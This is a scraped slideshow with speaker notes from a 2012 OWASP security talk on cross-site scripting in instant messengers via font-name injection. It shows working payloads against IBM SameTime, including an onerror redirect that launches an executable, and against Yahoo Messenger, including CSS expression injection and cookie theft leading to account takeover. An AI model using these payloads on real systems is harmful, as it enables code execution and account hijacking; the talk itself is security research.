Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Upcoming SlideShare
Expedited Removal Article_NM
Expedited Removal Article_NM
Loading in …3
×
1 of 44

Stylish XSS

2

Share

Download to read offline

Stylish XSS
via Font Name Injection

Presented by Adi Cohen at OWASP Israel 2012

Related Books

Free with a 30 day trial from Scribd

See all

Stylish XSS

  1. 1. © 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
  2. 2. © 2012 IBM Corporation IBM Security Systems 2 Background - Instant Messengers
  3. 3. © 2012 IBM Corporation IBM Security Systems 3 Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
  4. 4. © 2012 IBM Corporation IBM Security Systems 4 Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
  5. 5. © 2012 IBM Corporation IBM Security Systems 5 Background - Windows Fonts Windows accepts basically any character as part of the font name Font name length limited to ~30 chars
  6. 6. © 2012 IBM Corporation IBM Security Systems 6 IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  7. 7. © 2012 IBM Corporation IBM Security Systems 7 SameTime - Exploit - CSS Font Name: expression(alert(1));
  8. 8. © 2012 IBM Corporation IBM Security Systems 8 SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
  9. 9. © 2012 IBM Corporation IBM Security Systems 9 SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  10. 10. © 2012 IBM Corporation IBM Security Systems 10 SameTime - Exploit ~50 Fonts Later
  11. 11. © 2012 IBM Corporation IBM Security Systems 11 SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
  12. 12. © 2012 IBM Corporation IBM Security Systems 12 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
  13. 13. © 2012 IBM Corporation IBM Security Systems 13 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
  14. 14. © 2012 IBM Corporation IBM Security Systems 14 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  15. 15. © 2012 IBM Corporation IBM Security Systems 15 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  16. 16. © 2012 IBM Corporation IBM Security Systems 16 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  17. 17. © 2012 IBM Corporation IBM Security Systems 17 SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  18. 18. © 2012 IBM Corporation IBM Security Systems 18 Yahoo Messenger
  19. 19. © 2012 IBM Corporation IBM Security Systems 19 Yahoo Messenger – Message View Lots of Colors, but that’s about it…
  20. 20. © 2012 IBM Corporation IBM Security Systems 20 Yahoo Messenger - History View
  21. 21. © 2012 IBM Corporation IBM Security Systems 21 Yahoo Messenger - History View
  22. 22. © 2012 IBM Corporation IBM Security Systems 22 Yahoo Messenger - History View Finally, Yahoo's purple alert!
  23. 23. © 2012 IBM Corporation IBM Security Systems 23 Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
  24. 24. © 2012 IBM Corporation IBM Security Systems 24 Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
  25. 25. © 2012 IBM Corporation IBM Security Systems 25 Yahoo Messenger - Digging Deeper Accessing this URL in Chrome, yields the same result.
  26. 26. © 2012 IBM Corporation IBM Security Systems 26 Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
  27. 27. © 2012 IBM Corporation IBM Security Systems 27 Yahoo Messenger - Recap 1. Send the victim a message that contain malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it not local) 4. Have the victim click the Instant Message from the drop-down box
  28. 28. © 2012 IBM Corporation IBM Security Systems 28 Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  29. 29. © 2012 IBM Corporation IBM Security Systems 29 Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text, is being rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
  30. 30. © 2012 IBM Corporation IBM Security Systems 30 Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
  31. 31. © 2012 IBM Corporation IBM Security Systems 31 Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped <font style="font-size:1&amp;color:red" >xxxx</font>
  32. 32. © 2012 IBM Corporation IBM Security Systems 32 Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  33. 33. © 2012 IBM Corporation IBM Security Systems 33 Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
  34. 34. © 2012 IBM Corporation IBM Security Systems 34 Yahoo Web Messenger - IE Version
  35. 35. © 2012 IBM Corporation IBM Security Systems 35 Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
  36. 36. © 2012 IBM Corporation IBM Security Systems 36 Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
  37. 37. © 2012 IBM Corporation IBM Security Systems 37 Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering <font size="15pt;font-family:expression(alert(1));">
  38. 38. © 2012 IBM Corporation IBM Security Systems 38 Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
  39. 39. © 2012 IBM Corporation IBM Security Systems 39 Yahoo Web Messenger - IE Version Yet somehow, no alert
  40. 40. © 2012 IBM Corporation IBM Security Systems 40 Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  41. 41. © 2012 IBM Corporation IBM Security Systems 41 Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
  42. 42. © 2012 IBM Corporation IBM Security Systems 42 Yahoo Web Messenger - Finally
  43. 43. © 2012 IBM Corporation IBM Security Systems 43 Yahoo Messenger - History Window
  44. 44. © 2012 IBM Corporation IBM Security Systems 44 Questions?

Editor's Notes

  • Who am I?

    This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients
    One of which will not be disclosed today due to the fact that it was not yet patched.

    It will be publish in our blog once it is patched
  • Explain how IMs work:

    Talk about:
    --------------
    The message window is actually a browser
    The users text message is wrapped in HTML\XML template containing the following fields
    Message is sent to and then rendered as HTML\XML in the clients browser.


    Accept parameters dictating:
    color
    Font name
    Font weight
    Font style
    And more


    בואו נדבר על IMS
    ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו
    ונשאיר רק את האספקט של שליחת ההודעות.
    אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא




  • Explain how IMs work:

    Talk about:
    --------------
    The message window is actually a browser
    The users text message is wrapped in HTML\XML template containing the following fields
    Message is sent to and then rendered as HTML\XML in the clients browser.


    Accept parameters dictating:
    color
    Font name
    Font weight
    Font style
    And more


    בואו נדבר על IMS
    ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו
    ונשאיר רק את האספקט של שליחת ההודעות.
    אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא




  • To configure all these setting, these apps usually come with a screen like this one


    Every time I’ve seen this screen, I wondered “what if I could use some HTML here…”

  • And apparently, you can!


    Windows fonts,

    All Chars are valid
    Max 30 chars in every font name

  • Explain that the font we change, goes into this template and then sent out.

    Talk about possibilities of exploits:
    1. Expression
    2. Get out to span tag
    3. Get out to HTML main context
  • Starting off with expression
  • The server actually filtered everything in the CSS
  • Moving to the next payload,
    Getting out of the style attr and getting into a new onclick attr

    Result in the onclick being empty. No good
  • Two fields attack


    First field (Font Name):
    -----------
    1. Filter deletes the <style<style</style part
    2. We are left with e0”><img x=‘…..
    Opens a new IMG tag with X attribute (using a single quot)

    Second field (Message Text):
    ---------------
    1. Closes the X attribute (it contains all the rest of the real CSS)
    2. Adds a SRC attribute
    3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file
    4. File will be executed


  • Two fields attack


    First field (Font Name):
    -----------
    1. Filter deletes the <style<style</style part
    2. We are left with e0”><img x=‘…..
    Opens a new IMG tag with X attribute (using a single quot)

    Second field (Message Text):
    ---------------
    1. Closes the X attribute (it contains all the rest of the real CSS)
    2. Adds a SRC attribute
    3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file
    4. File will be executed


  • Two fields attack


    First field (Font Name):
    -----------
    1. Filter deletes the <style<style</style part
    2. We are left with e0”><img x=‘…..
    Opens a new IMG tag with X attribute (using a single quot)

    Second field (Message Text):
    ---------------
    1. Closes the X attribute (it contains all the rest of the real CSS)
    2. Adds a SRC attribute
    3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file
    4. File will be executed


  • Two fields attack


    First field (Font Name):
    -----------
    1. Filter deletes the <style<style</style part
    2. We are left with e0”><img x=‘…..
    Opens a new IMG tag with X attribute (using a single quot)

    Second field (Message Text):
    ---------------
    1. Closes the X attribute (it contains all the rest of the real CSS)
    2. Adds a SRC attribute
    3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file
    4. File will be executed


  • Two fields attack


    First field (Font Name):
    -----------
    1. Filter deletes the <style<style</style part
    2. We are left with e0”><img x=‘…..
    Opens a new IMG tag with X attribute (using a single quot)

    Second field (Message Text):
    ---------------
    1. Closes the X attribute (it contains all the rest of the real CSS)
    2. Adds a SRC attribute
    3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file
    4. File will be executed


  • Two fields attack


    First field (Font Name):
    -----------
    1. Filter deletes the <style<style</style part
    2. We are left with e0”><img x=‘…..
    Opens a new IMG tag with X attribute (using a single quot)

    Second field (Message Text):
    ---------------
    1. Closes the X attribute (it contains all the rest of the real CSS)
    2. Adds a SRC attribute
    3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file
    4. File will be executed


  • Second line shows the trapped CSS in the X parameter
    Calc executed example
  • Yahoo

    No History found in local FS, meaning template is unknown

    Messages sent takes about 3-4 hours till they register in the History
    That means that every time I wanted to test anything, I have to wait 3-4 for the results and only then tweak my payloads and resend everything…

  • Message view seems to sanitize input well,
    All messages sent managed to do nothing more the pretty colors

    Taking into account the fact that every test take 3 hours, I decided its best to move on and open the history
  • Looks a bit better but still, nothing interesting…
  • The next step I took was to change the history filter to “Instant Messages”
  • Boom
    Endless pop ups poped up…
    Apparently a lot of my tests worked…
  • I isolated the simplest payload that worked and we can now move on and get some info such as:
    User Agent
    Privileges
    Etc…
  • Digging deeper got us the browser type (IE)
    And the location of the page, which is an internet address
  • So I tried accessing this page using chrome, and as long as I was Logged in to Yahoo! It got me to the same results!
  • The next thing I found was the cookie

    Apparently, Yahoo don’t like to use HTTP-only cookies, so once stealing the cookie actually means stealing the account!
  • Send message
    Wait 3-4h
    Social engineer the user into opening the History
    Have the user click on the Instant Messages context menu
  • No more 3 hours tests

    I can now send a message and see it on the web messenger immediately
    I now know the template.
  • I sent the first line of code
    The web messenger rendered the second line of code

    Changes:
    Added a new ID attribute – We don’t care!
    Transformed the Size attribute into a CSS Font-Size attribute – Very Interesting!




  • First, I tried to inject a new color:red sentence
    Using the & -> &amp; encoding in order to terminate the css rule and inject a new one

    And that worked without a glitch


  • Tried the same with an expression call, and all seems well

  • Opening IE
    But no alert…


    After digging a little deeper
  • Different sanitizer per browser

    Found an older message that has a similar behavior

    Worked in that example till I found some guidelines for the transformation on IE

  • Talk about the two rules of transformation
  • Using these guidelines I attempted a new rule injection
  • Payload found – new rule injected
    Explain the CSS encoding trick
  • Everything looks good in IE
  • Somehow, no alert
  • Goddamn meta tag

    But this meta tag doesn’t work in IE<8
  • VM
    Kick off IE8
  • Entered the same URL with IE 7 and the alert shows up
  • Also in the original History view of the messenger which actually uses the installed IE
  • ×